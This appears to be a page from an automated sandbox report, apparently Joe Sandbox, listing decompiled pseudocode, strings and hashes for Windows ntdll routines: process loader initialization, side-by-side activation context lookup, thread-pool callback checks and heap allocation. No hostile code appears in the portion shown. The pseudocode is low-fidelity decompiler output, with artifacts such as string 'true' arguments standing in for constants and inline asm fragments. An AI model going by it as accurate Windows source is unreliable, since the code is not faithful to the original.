				void* _t138;
				intOrPtr _t146;
				void* _t149;
				void* _t150;
				void* _t151;
				void* _t153;
				void* _t154;
				intOrPtr _t158;
				signed int _t160;
				void* _t163;

				_t162 = (_t160 & 0xfffffff8) - 0x124;
				_v8 =  *0x36bdb370 ^ (_t160 & 0xfffffff8) - 0x00000124;
				_t137 = 0;
				_v264 = 0;
				_v280 = 0;
				_t163 =  *0x36bd5d70 - _t137; // 0x0
				if(_t163 != 0) {
					L18:
					_t77 = 0;
					L16:
					_pop(_t149);
					_pop(_t153);
					_pop(_t138);
					return E36B24B50(_t77, _t138, _v8 ^ _t162, _t147, _t149, _t153);
				}
				_push( &_v260);
				_push(0);
				_push(0);
				_push( *((intOrPtr*)( *[fs:0x30] + 8)));
				_t150 = 3;
				_push(_t150);
				E36AEE580();
				_t154 = 2;
				_t83 =  *(_v280 + 0x5c) & 0x0000ffff;
				if(_t83 != _t150) {
					if(_t83 == _t154) {
						goto L2;
					}
					goto L18;
				}
				L2:
				_push(0x36ab13b0);
				_push(_t150);
				_push( &_v268);
				_t85 = E36B22AB0();
				_push("true");
				_pop(_t151);
				if(_t85 >= 0) {
					_push( &_v256);
					_push("true");
					_push( &_v92);
					_push(_t154);
					_push(0x36ab1a88);
					_push(_v268);
					_t88 = E36B22B00();
					_push(_v292);
					E36B22A80();
					if(_t88 < 0 || _v88 != _t151 || _v84 != _t151 || _v80 <= _t137) {
						_t154 = 2;
						goto L3;
					} else {
						L15:
						_t77 = _t137;
						goto L16;
					}
				}
				L3:
				_push(0x36bd33b0);
				_push(0x20019);
				_v293 = _t137;
				_push( &_v288);
				_v288 = _t137;
				if(E36B22AB0() >= 0) {
					_push( &_v284);
					_push("true");
					_push( &_v220);
					_push(_t154);
					_push(_v288);
					_t94 = E36B22AF0();
					_push(_v308);
					_t156 = _t94;
					E36B22A80();
					_t52 = _t156 + 0x7ffffffb; // 0x7ffffffb
					asm("sbb ecx, ecx");
					_t139 =  ~_t52 & _t94;
					if(( ~_t52 & _t94) < 0 || _v200 == _t137) {
						goto L4;
					} else {
						L26:
						if(E36AFDDA0(_t137, _t137, 0x36ab1a78,  &_v264) >= 0) {
							_t158 = _v264;
							if(E36AFCF00(_t139, _t147, _t158, 0x36ab1a90, _t137,  &_v280, _t137, _v0) < 0 || _v280 == _t137) {
								E36AFCD80(_t139, _t158);
								_t137 = 0xc0000139;
							} else {
								asm("ror eax, cl");
								 *0x36bd5b64 =  *0x7ffe0330 ^ _v280;
								 *0x36bd68e4 = _t158;
							}
						} else {
							_t137 = 0xc0000135;
						}
						goto L15;
					}
				}
				L4:
				_push(0x36ab1398);
				_push("true");
				_push( &_v292);
				if(E36B22AB0() < 0) {
					L7:
					if(E36B03890(_t137,  &_v252) < 0) {
						goto L15;
					}
					_v276 = 0;
					_t102 = (_v252 & 0x0000ffff) + 0x78;
					if(_t102 > 0xfffe) {
						L14:
						E36AF3B90( &_v252);
						if(_v297 != _t137) {
							goto L26;
						}
						goto L15;
					}
					_t146 =  *0x36bd5d78; // 0x0
					_t147 = _t102 & 0x0000ffff;
					_t139 = _t146 + 0x180000;
					_v274 = _t102 & 0x0000ffff;
					_t113 = E36AF5D90(_t146 + 0x180000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t146 + 0x180000, _t102 & 0x0000ffff);
					_v284 = _t113;
					if(_t113 == 0) {
						goto L14;
					}
					if(E36B010D0(_t139,  &_v276,  &_v252) >= 0 && E36AEFE40(_t139,  &_v276, L"\\Software\\Policies\\Microsoft\\Windows\\Safer\\CodeIdentifiers") >= 0) {
						_v244 = 0x18;
						_v236 =  &_v276;
						_push( &_v244);
						_push("true");
						_v240 = _t137;
						_push( &_v292);
						_v232 = 0x40;
						_v228 = _t137;
						_v224 = _t137;
						if(E36B22AB0() >= 0) {
							_push( &_v284);
							_push("true");
							_push( &_v172);
							_push(2);
							_push(0x36ab1390);
							_push(_v292);
							_t127 = E36B22B00();
							_push(_v316);
							E36B22A80();
							if(_t127 >= 0 && _v168 == _t151 && _v164 == _t151 && _v160 > 1) {
								_v293 = 1;
							}
						}
					}
					E36AF3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t137, _v272);
					goto L14;
				} else {
					_push( &_v284);
					_push("true");
					_push( &_v172);
					_push(2);
					_push(0x36ab1390);
					_push(_v292);
					if(E36B22B00() >= 0) {
						if(_v168 == _t151 && _v164 == _t151 && _v160 > 1) {
							_v293 = 1;
							_push( &_v284);
							_push("true");
							_push( &_v172);
							_push(2);
							_push(0x36ab1a80);
							_push(_v292);
							E36B22B00();
						}
					}
					_push(_v292);
					E36B22A80();
					if(_v297 != _t137) {
						goto L26;
					}
					goto L7;
				}
			}

0x36b1832a
0x36b18337
0x36b1833f
0x36b18343
0x36b18347
0x36b1834b
0x36b18351
0x36b18515
0x36b18515
0x36b184f7
0x36b184fe
0x36b184ff
0x36b18500
0x36b1850b
0x36b1850b
0x36b1835b
0x36b18362
0x36b18363
0x36b18364
0x36b18369
0x36b1836a
0x36b1836b
0x36b18376
0x36b18377
0x36b1837e
0x36b1850f
0x00000000
0x00000000
0x00000000
0x36b1850f
0x36b18384
0x36b18384
0x36b18389
0x36b1838e
0x36b1838f
0x36b18394
0x36b18396
0x36b18399
0x36b54eee
0x36b54eef
0x36b54ef8
0x36b54ef9
0x36b54efa
0x36b54eff
0x36b54f03
0x36b54f08
0x36b54f0e
0x36b54f15
0x36b54f38
0x00000000
0x36b184f5
0x36b184f5
0x36b184f5
0x00000000
0x36b184f5
0x36b54f15
0x36b1839f
0x36b1839f
0x36b183a4
0x36b183ad
0x36b183b1
0x36b183b2
0x36b183bd
0x36b54f42
0x36b54f43
0x36b54f49
0x36b54f4a
0x36b54f4b
0x36b54f4f
0x36b54f54
0x36b54f58
0x36b54f5a
0x36b54f5f
0x36b54f67
0x36b54f69
0x36b54f6b
0x00000000
0x36b54f7b
0x36b54f7b
0x36b54f8e
0x36b55052
0x36b5506a
0x36b55093
0x36b55098
0x36b55072
0x36b55080
0x36b55082
0x36b55087
0x36b55087
0x36b54f94
0x36b54f94
0x36b54f94
0x00000000
0x36b54f8e
0x36b54f6b
0x36b183c3
0x36b183c3
0x36b183c8
0x36b183ce
0x36b183db
0x36b18413
0x36b1841f
0x00000000
0x00000000
0x36b18427
0x36b18431
0x36b18439
0x36b184e1
0x36b184e6
0x36b184ef
0x00000000
0x00000000
0x00000000
0x36b184ef
0x36b1843f
0x36b18445
0x36b18448
0x36b18456
0x36b1845e
0x36b18463
0x36b18469
0x00000000
0x00000000
0x36b1847c
0x36b18495
0x36b1849d
0x36b184a5
0x36b184a6
0x36b184ac
0x36b184b0
0x36b184b1
0x36b184b9
0x36b184bd
0x36b184c8
0x36b54ff3
0x36b54ff4
0x36b54ffd
0x36b54ffe
0x36b55000
0x36b55001
0x36b55005
0x36b5500a
0x36b55010
0x36b55017
0x36b55045
0x36b55045
0x36b55017
0x36b184c8
0x36b184dc
0x00000000
0x36b183dd
0x36b183e1
0x36b183e2
0x36b183eb
0x36b183ec
0x36b183ee
0x36b183ef
0x36b183fa
0x36b54fa5
0x36b54fca
0x36b54fcf
0x36b54fd0
0x36b54fd9
0x36b54fda
0x36b54fdc
0x36b54fe1
0x36b54fe5
0x36b54fe5
0x36b54fa5
0x36b18400
0x36b18404
0x36b1840d
0x00000000
0x00000000
0x00000000
0x36b1840d

Strings

@, xrefs: 36B184B1
\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 36B1847E
LdrpInitializeProcess, xrefs: 36B18342
minkernel\ntdll\ldrinit.c, xrefs: 36B18341

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID:
String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
API String ID: 0-1918872054
Opcode ID: 90f908ea53a8b541723f451d7fb452d85895283fd1b1a499fdc37ab0d7e655f7
Instruction ID: 14a944d1135a860774b38101dda3a78b65684f51b5ea777d8fde78d55a29acce
Opcode Fuzzy Hash: 90f908ea53a8b541723f451d7fb452d85895283fd1b1a499fdc37ab0d7e655f7
Instruction Fuzzy Hash: 8F916771518355AEE721CB25CC40EABBBECFB84784F40092EFA8996150E738D904CF63

Uniqueness

Uniqueness Score: -1.00%

Function 36B1265C Relevance: 5.2, Strings: 4, Instructions: 249
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E36B1265C(signed char __ecx, signed int __edx, intOrPtr _a4, signed int* _a8, signed int* _a12, signed int* _a16) {
				signed int _v8;
				char _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				char* _v548;
				short _v550;
				short _v552;
				signed int* _v556;
				signed int* _v560;
				signed int* _v564;
				signed int _v568;
				void* __ebx;
				void* __edi;
				void* __esi;
				short _t95;
				intOrPtr _t96;
				void* _t104;
				signed int _t105;
				signed int* _t107;
				void* _t111;
				void* _t113;
				signed int _t119;
				intOrPtr _t120;
				void* _t121;
				char* _t128;
				signed int _t131;
				signed short _t139;
				signed int _t142;
				signed int _t147;
				signed int _t149;
				signed int _t154;

				_t141 = __edx;
				_v8 =  *0x36bdb370 ^ _t154;
				_v556 = _a12;
				_t128 =  &_v532;
				_v560 = _a8;
				_t147 = 0;
				_v564 = _a16;
				_t142 = 0;
				_v540 = __ecx;
				_v532 = 0;
				_t131 = 0;
				_v552 = 0;
				_t95 = 2;
				_v550 = _t95;
				_t96 = _a4;
				_v536 = 0;
				_v544 = 0;
				_v548 = _t128;
				if(_t96 == 0x36ab120c) {
					E36B6EF10(0x33, 0, "SXS: %s() passed the empty activation context\n", "RtlpGetActivationContextDataStorageMapAndRosterHeader");
					_t148 = 0xc000000d;
					L39:
					return E36B24B50(_t148, _t128, _v8 ^ _t154, _t141, _t142, _t148);
				}
				if(_v560 != 0) {
					 *_v560 =  *_v560 & 0;
					_t147 = 0;
				}
				if(_v556 != _t131) {
					 *_v556 =  *_v556 & _t131;
					_t147 = _t131;
				}
				if(_v564 != _t131) {
					 *_v564 =  *_v564 & _t142;
					_t131 = _t142;
				}
				if((_v540 & 0xfffffffc) != 0 || _t141 == 0 || _v560 == _t142 || _v556 == _t142) {
					_push(_v556);
					_push(_v560);
					_push(_t141);
					_push(_v540);
					E36B6EF10(0x33, 0, "SXS: %s() bad parameters:\nSXS:    Flags                : 0x%lx\nSXS:    Peb                  : %p\nSXS:    ActivationContextData: %p\nSXS:    AssemblyStorageMap   : %p\n", "RtlpGetActivationContextDataStorageMapAndRosterHeader");
					_t148 = 0xc000000d;
					goto L37;
				} else {
					if(_t96 != 0) {
						if(_t96 == 0xfffffffc) {
							L24:
							_t57 = _t141 + 0x200; // 0x230
							_t131 = _t57;
							_t104 =  *_t131;
							_t58 = _t141 + 0x204; // 0x234
							_t147 = _t58;
							_v536 = _t131;
							_v544 = _t147;
							if(_t104 == 0) {
								L33:
								_t105 =  *_t147;
								L34:
								_t141 = _v556;
								 *_v556 = _t105;
								 *_v560 =  *_t131;
								_t107 = _v564;
								if(_t107 != 0) {
									 *_t107 = _t142;
								}
								_t148 = 0;
								L37:
								if(_t128 != 0 && _t128 !=  &_v532) {
									E36AF3B90( &_v552);
								}
								goto L39;
							}
							_t142 =  *((intOrPtr*)(_t104 + 0x18)) + _t104;
							L26:
							_t141 = 0;
							if( *_t131 != 0 &&  *_t147 == 0) {
								_t108 =  *(_t142 + 8);
								if( *(_t142 + 8) > 0x3ffffffc) {
									_t148 = 0xc0000095;
									goto L37;
								}
								_t111 = E36AF5D90(_t131,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xc + _t108 * 4);
								_t129 = _t111;
								if(_t111 == 0) {
									_t148 = 0xc0000017;
									L51:
									_t128 = _v548;
									goto L37;
								}
								_t141 =  *(_t142 + 8);
								_t113 = E36B133D0(_t129,  *(_t142 + 8), _t129 + 0xc);
								_t148 = _t113;
								if(_t113 < 0) {
									E36AF3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t129);
									goto L51;
								}
								_t147 = _v544;
								asm("lock cmpxchg [esi], ecx");
								if(0 != 0) {
									E36AD9303(_t129);
									E36AF3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t129);
								}
								_t131 = _v536;
								_t128 = _v548;
							}
							goto L33;
						}
						if((_v540 & 0x00000003) != 0) {
							goto L12;
						}
						_t131 = _t96 + 0x10;
						_t141 =  *_t131;
						if(_t141 == 0) {
							_t148 = 0xc00000e5;
							goto L39;
						}
						_t142 =  *((intOrPtr*)(_t141 + 0x18)) + _t141;
						_t105 = _t96 + 0x5c;
						goto L34;
					}
					L12:
					if(_t96 == 0xfffffffc || (_v540 & 0x00000002) != 0) {
						goto L24;
					} else {
						if(_t96 != 0) {
							if((_v540 & 0x00000001) == 0) {
								goto L26;
							}
						}
						_t31 = _t141 + 0x1f8; // 0x228
						_t131 = _t31;
						_t119 =  *_t131;
						_t32 = _t141 + 0x1fc; // 0x22c
						_t147 = _t32;
						_v536 = _t131;
						_v544 = _t147;
						if(_t119 == 0) {
							goto L33;
						}
						_t142 =  *((intOrPtr*)(_t119 + 0x18)) + _t119;
						_v568 = _t142;
						if( *_t147 != 0) {
							goto L26;
						}
						_t120 =  *((intOrPtr*)(_t141 + 0x10));
						_t141 = 0x208;
						_t139 =  *(_t120 + 0x38);
						_t142 =  *(_t120 + 0x3c);
						_t149 = _t139 & 0x0000ffff;
						_v540 = _t139;
						_t41 = _t149 + 0xe; // 0x23a
						_t121 = _t41;
						if(_t121 > 0x208) {
							if(_t121 <= 0xfffe) {
								_v550 = _t139 + 0xe;
								_t128 = E36AF5D60(_t139 + 0x0000000e & 0x0000ffff);
								_v548 = _t128;
								if(_t128 != 0) {
									L19:
									E36B288C0(_t128, _t142, _t149);
									_t131 = _v536;
									_v552 = _v540 + 0xc;
									asm("movsd");
									asm("movsd");
									asm("movsd");
									asm("movsw");
									_t142 = _v568;
									_t147 = _v544;
									goto L26;
								}
								_t148 = 0xc0000017;
								goto L39;
							}
							_t148 = 0xc0000106;
							goto L39;
						}
						_t128 =  &_v532;
						_v550 = 0x208;
						_v548 = _t128;
						goto L19;
					}
				}
			}

0x36b1265c
0x36b1266e
0x36b12675
0x36b1267b
0x36b12685
0x36b1268b
0x36b12691
0x36b12697
0x36b1269b
0x36b126a1
0x36b126a8
0x36b126aa
0x36b126b3
0x36b126b4
0x36b126bb
0x36b126be
0x36b126c4
0x36b126ca
0x36b126d5
0x36b51ff1
0x36b51ff9
0x36b12906
0x36b12916
0x36b12916
0x36b126e1
0x36b126e9
0x36b126eb
0x36b126eb
0x36b126f3
0x36b126fb
0x36b126fd
0x36b126fd
0x36b12705
0x36b1270d
0x36b1270f
0x36b1270f
0x36b1271b
0x36b520a8
0x36b520ae
0x36b520b4
0x36b520b5
0x36b520c9
0x36b520d1
0x00000000
0x36b12741
0x36b12743
0x36b12813
0x36b1283c
0x36b1283c
0x36b1283c
0x36b12842
0x36b12844
0x36b12844
0x36b1284a
0x36b12850
0x36b12858
0x36b128d2
0x36b128d2
0x36b128d4
0x36b128d4
0x36b128da
0x36b128e4
0x36b128e6
0x36b128ee
0x36b128f0
0x36b128f0
0x36b128f2
0x36b128f4
0x36b128f6
0x36b520e2
0x36b520e2
0x00000000
0x36b128f6
0x36b1285d
0x36b1285f
0x36b1285f
0x36b12863
0x36b12869
0x36b12871
0x36b5205d
0x00000000
0x36b5205d
0x36b12889
0x36b1288e
0x36b12892
0x36b52067
0x36b52080
0x36b52080
0x00000000
0x36b52080
0x36b12898
0x36b128a1
0x36b128a6
0x36b128aa
0x36b5207b
0x00000000
0x36b5207b
0x36b128b0
0x36b128ba
0x36b128c0
0x36b5208d
0x36b5209e
0x36b5209e
0x36b128c6
0x36b128cc
0x36b128cc
0x00000000
0x36b12863
0x36b1281c
0x00000000
0x00000000
0x36b12822
0x36b12825
0x36b12829
0x36b52003
0x00000000
0x36b52003
0x36b12832
0x36b12834
0x00000000
0x36b12834
0x36b12749
0x36b1274c
0x00000000
0x36b1275f
0x36b12761
0x36b52014
0x00000000
0x00000000
0x36b5201a
0x36b12767
0x36b12767
0x36b1276d
0x36b1276f
0x36b1276f
0x36b12775
0x36b1277b
0x36b12783
0x00000000
0x00000000
0x36b1278c
0x36b12791
0x36b12797
0x00000000
0x00000000
0x36b1279d
0x36b127a0
0x36b127a5
0x36b127a8
0x36b127ab
0x36b127ae
0x36b127b4
0x36b127b4
0x36b127b9
0x36b52024
0x36b52033
0x36b52043
0x36b52045
0x36b5204d
0x36b127d2
0x36b127d5
0x36b127e8
0x36b127ee
0x36b127fd
0x36b127fe
0x36b127ff
0x36b12800
0x36b12802
0x36b12808
0x00000000
0x36b12808
0x36b52053
0x00000000
0x36b52053
0x36b52026
0x00000000
0x36b52026
0x36b127bf
0x36b127c5
0x36b127cc
0x00000000
0x36b127cc
0x36b1274c

Strings

RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 36B51FE3, 36B520BB
SXS: %s() passed the empty activation context, xrefs: 36B51FE8
SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 36B520C0
.Local, xrefs: 36B127F8

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID:
String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
API String ID: 0-1239276146
Opcode ID: 07538d297af1a47fdbfd871b2eb7b16caaf044d91a1294415c106348b2a520bd
Instruction ID: bca16c0582279ce451546a099017aa2202613e265c3cc76b76fe263825a78233
Opcode Fuzzy Hash: 07538d297af1a47fdbfd871b2eb7b16caaf044d91a1294415c106348b2a520bd
Instruction Fuzzy Hash: ABA1BB75D01229ABEB24CF65CC94B99B3B0FF18354F2501EAD988AB251D7309EC1CF98

Uniqueness

Uniqueness Score: -1.00%

Function 36AE63CB Relevance: 5.2, Strings: 4, Instructions: 211
COMMON

Download Yara Rule

C-Code - Quality: 56%

			E36AE63CB(signed int __ecx) {
				signed int _v8;
				intOrPtr _v68;
				intOrPtr _v72;
				char _v76;
				char _v92;
				char _v100;
				char _v104;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t88;
				intOrPtr _t100;
				signed int _t121;
				void* _t122;
				signed char _t126;
				void* _t128;
				void* _t131;
				void* _t133;
				signed int _t136;
				signed int _t138;

				_t123 = __ecx;
				_t138 = (_t136 & 0xfffffff8) - 0x64;
				_t83 =  *0x36bdb370 ^ _t138;
				_v8 =  *0x36bdb370 ^ _t138;
				_t121 = __ecx;
				if(__ecx == 0) {
					L15:
					_pop(_t128);
					_pop(_t133);
					_pop(_t122);
					return E36B24B50(_t83, _t122, _v8 ^ _t138, _t126, _t128, _t133);
				} else {
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v104 = 0;
					_v100 = 0;
					_t88 = E36B28870( *[fs:0x18] + 0x19c,  &_v104, "true");
					_t138 = _t138 + 0xc;
					if(_t88 != 0) {
						_push("true");
						_push( &_v104);
						_push("true");
						_push(0xfffffffe);
						if(E36B22A60() >= 0) {
							_t123 =  *[fs:0x18];
							 *((intOrPtr*)(_t123 + 0x19c)) = _v104;
							 *((intOrPtr*)(_t123 + 0x1a0)) = _v100;
						}
					}
					if(( *(_t121 + 0x28) & 0x00000001) != 0) {
						if(( *(_t121 + 0x38) & 0x00000001) == 0) {
							_t123 = _t121;
							E36AFC700(_t121);
							 *(_t121 + 0x28) =  *(_t121 + 0x28) & 0x000000fe;
						}
					}
					if( *((intOrPtr*)(_t121 + 0x2c)) != 0) {
						if(( *(_t121 + 0x38) & 0x00000002) == 0) {
							E36B0F1F0(0);
							 *((intOrPtr*)(_t121 + 0x2c)) = 0;
						}
					}
					_t83 =  *(_t121 + 0x48);
					if(_t83 != 0 && ( *(_t83 + 0x10c) & 0x00000001) == 0) {
						_t83 =  *[fs:0x18];
						_push("true");
						_pop(_t131);
						if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) != 0) {
							if(( *(_t121 + 0x38) & 0x00000004) == 0) {
								E36B28F40( &_v92, 0, _t131);
								_t138 = _t138 + 0xc;
								_v72 =  *((intOrPtr*)(_t121 + 0x30));
								_v68 =  *((intOrPtr*)(_t121 + 0x34));
								_push( &_v92);
								_v92 = 0xc0000710;
								_v76 = 2;
								E36B38A60(_t123, _t126);
								_push("true");
								_v100 = 0;
								_push( &_v100);
								_push(5);
								_push(0xfffffffe);
								_t83 = E36B22A60();
							}
						}
						_t126 =  *(_t121 + 0x38);
						if((_t126 & 0x00000010) == 0 && E36AE6929() != 0) {
							_push( *((intOrPtr*)(_t121 + 0x34)));
							E36B6EF10("true", 0, "ThreadPool: callback %p(%p) returned with a transaction uncleared\n",  *((intOrPtr*)(_t121 + 0x30)));
							E36B28F40( &_v92, 0, _t131);
							_t138 = _t138 + 0x20;
							_v92 = 0xc000071d;
							_v76 = 0;
							_push( &_v92);
							_t83 = E36B38A60(_t123, _t126);
							_t126 =  *(_t121 + 0x38);
						}
						if((_t126 & 0x00000020) == 0) {
							_t123 =  *[fs:0x18];
							_t100 =  *((intOrPtr*)( *[fs:0x30] + 0xa0));
							_t83 =  *(_t100 + 0xc);
							if( *(_t100 + 0xc) ==  *((intOrPtr*)( *[fs:0x18] + 0x24))) {
								_push( *((intOrPtr*)(_t121 + 0x34)));
								E36B6EF10("true", 0, "ThreadPool: callback %p(%p) returned with the loader lock held\n",  *((intOrPtr*)(_t121 + 0x30)));
								E36B28F40( &_v92, 0, _t131);
								_t138 = _t138 + 0x20;
								_v92 = 0xc000071e;
								_v76 = 0;
								_push( &_v92);
								_t83 = E36B38A60(_t123, _t126);
								_t126 =  *(_t121 + 0x38);
							}
						}
						if((_t126 & 0x00000040) == 0) {
							_t83 =  *[fs:0x18];
							if( *((intOrPtr*)( *[fs:0x18] + 0xfb8)) != 0) {
								_push( *((intOrPtr*)(_t121 + 0x34)));
								E36B6EF10("true", 0, "ThreadPool: callback %p(%p) returned with preferred languages set\n",  *((intOrPtr*)(_t121 + 0x30)));
								E36B28F40( &_v92, 0, _t131);
								_t138 = _t138 + 0x20;
								_v92 = 0xc000071f;
								_v76 = 0;
								_push( &_v92);
								_t83 = E36B38A60(_t123, _t126);
								_t126 =  *(_t121 + 0x38);
							}
						}
						if(_t126 >= 0) {
							_t83 =  *[fs:0x18];
							if( *((intOrPtr*)( *[fs:0x18] + 0xf88)) != 0) {
								_push( *((intOrPtr*)(_t121 + 0x34)));
								E36B6EF10("true", 0, "ThreadPool: callback %p(%p) returned with background priorities set\n",  *((intOrPtr*)(_t121 + 0x30)));
								E36B28F40( &_v92, 0, _t131);
								_t138 = _t138 + 0x20;
								_v92 = 0xc0000720;
								_v76 = 0;
								_push( &_v92);
								_t83 = E36B38A60(_t123, _t126);
							}
						}
					}
					goto L15;
				}
			}

0x36ae63cb
0x36ae63d3
0x36ae63db
0x36ae63dd
0x36ae63e2
0x36ae63e8
0x36ae64d4
0x36ae64d8
0x36ae64d9
0x36ae64da
0x36ae64e5
0x36ae63ee
0x36ae640e
0x36ae6415
0x36ae6416
0x36ae6417
0x36ae641a
0x36ae641e
0x36ae6422
0x36ae6427
0x36ae642c
0x36b40d22
0x36b40d28
0x36b40d29
0x36b40d2b
0x36b40d34
0x36b40d3a
0x36b40d45
0x36b40d4f
0x36b40d4f
0x36b40d34
0x36ae6436
0x36b40d5e
0x36b40d64
0x36b40d66
0x36b40d6b
0x36b40d6b
0x36b40d5e
0x36ae643f
0x36b40d78
0x36b40d7f
0x36b40d84
0x36b40d84
0x36b40d78
0x36ae6445
0x36ae644a
0x36ae6459
0x36ae645f
0x36ae6461
0x36ae6468
0x36b40d90
0x36b40d9d
0x36b40da5
0x36b40da8
0x36b40daf
0x36b40db7
0x36b40db8
0x36b40dc0
0x36b40dc8
0x36b40dcd
0x36b40dd3
0x36b40dd7
0x36b40dd8
0x36b40dda
0x36b40ddc
0x36b40ddc
0x36b40d90
0x36ae646e
0x36ae6474
0x36b40de6
0x36b40df4
0x36b40e03
0x36b40e08
0x36b40e0b
0x36b40e17
0x36b40e1b
0x36b40e1c
0x36b40e21
0x36b40e21
0x36ae6486
0x36ae648e
0x36ae6495
0x36ae649b
0x36ae64a1
0x36b40e29
0x36b40e37
0x36b40e46
0x36b40e4b
0x36b40e4e
0x36b40e5a
0x36b40e5e
0x36b40e5f
0x36b40e64
0x36b40e64
0x36ae64a1
0x36ae64aa
0x36ae64ac
0x36ae64b8
0x36b40e6c
0x36b40e7a
0x36b40e89
0x36b40e8e
0x36b40e91
0x36b40e9d
0x36b40ea1
0x36b40ea2
0x36b40ea7
0x36b40ea7
0x36ae64b8
0x36ae64c0
0x36ae64c2
0x36ae64ce
0x36b40eaf
0x36b40ebd
0x36b40ecc
0x36b40ed1
0x36b40ed4
0x36b40ee0
0x36b40ee4
0x36b40ee5
0x36b40ee5
0x36ae64ce
0x36ae64c0
0x00000000
0x36ae644a

Strings

ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 36B40E2F
ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 36B40EB5
ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 36B40DEC
ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 36B40E72

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID:
String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
API String ID: 0-1468400865
Opcode ID: eef3189e4119515cf452e92c0f2746d681c1014fd9e8cf13ca0487521e8e1101
Instruction ID: 4008a3bafc9489de4a2f98c27cc207076df5c268786416069667e5027702abdb
Opcode Fuzzy Hash: eef3189e4119515cf452e92c0f2746d681c1014fd9e8cf13ca0487521e8e1101
Instruction Fuzzy Hash: FE719BB1908314AFE750DF24CD84F8B7BA8EB857A4F501869FD488A286D734D598CFD2

Uniqueness

Uniqueness Score: -1.00%

Function 36ADF5C7 Relevance: 5.2, Strings: 4, Instructions: 188
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E36ADF5C7(void* __ecx, void* __edx) {
				char _v36;
				char _v40;
				void* _v44;
				void* _v48;
				void* _v60;
				void* _v64;
				void* _v72;
				void* _v76;
				void* __ebx;
				intOrPtr _t63;
				void* _t66;
				signed int _t73;
				void* _t77;
				void* _t78;
				signed char* _t81;
				intOrPtr _t82;
				signed char* _t87;
				intOrPtr _t88;
				void* _t89;
				signed char* _t92;
				signed char _t98;
				void* _t110;
				void* _t136;
				signed int _t138;
				void* _t140;

				_t140 = (_t138 & 0xfffffff8) - 0x24;
				_t110 = __edx;
				_t136 = __ecx;
				E36ADF858(__edx,  &_v36,  &_v40);
				if(E36B168EA( *((intOrPtr*)(_t136 + 0x1f8)) -  *((intOrPtr*)(_t136 + 0x244)), _t136, _t136 + 0xd4) == 0) {
					_t128 = 0xc000012d;
					L17:
					_t63 =  *[fs:0x30];
					 *((intOrPtr*)(_t136 + 0x228)) =  *((intOrPtr*)(_t136 + 0x228)) + 1;
					__eflags =  *(_t63 + 0xc);
					if( *(_t63 + 0xc) == 0) {
						_push("HEAP: ");
						E36ADB910();
					} else {
						E36ADB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push(_v40);
					_push(_v36);
					_push(_t136);
					E36ADB910("ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t128);
					_t66 = 0;
					L15:
					return _t66;
				}
				if(( *(_t136 + 0x40) & 0x00040000) != 0) {
					_push("true");
					_pop(_t130);
					_push(0);
					_push("true");
					_push(_t140 + 0x1c);
					_push(3);
					_push(_t136);
					_push(0xffffffff);
					_t73 = E36B22BE0();
					__eflags = _t73;
					if(_t73 < 0) {
						L22:
						E36BA5FED(0, _t136, "true",  *((intOrPtr*)(_t140 + 0x20)), 0, 0);
						goto L2;
					}
					__eflags =  *(_t140 + 0x18) & 0x00000060;
					if(( *(_t140 + 0x18) & 0x00000060) == 0) {
						goto L22;
					}
					__eflags =  *((intOrPtr*)(_t140 + 0x14)) - _t136;
					if( *((intOrPtr*)(_t140 + 0x14)) == _t136) {
						L3:
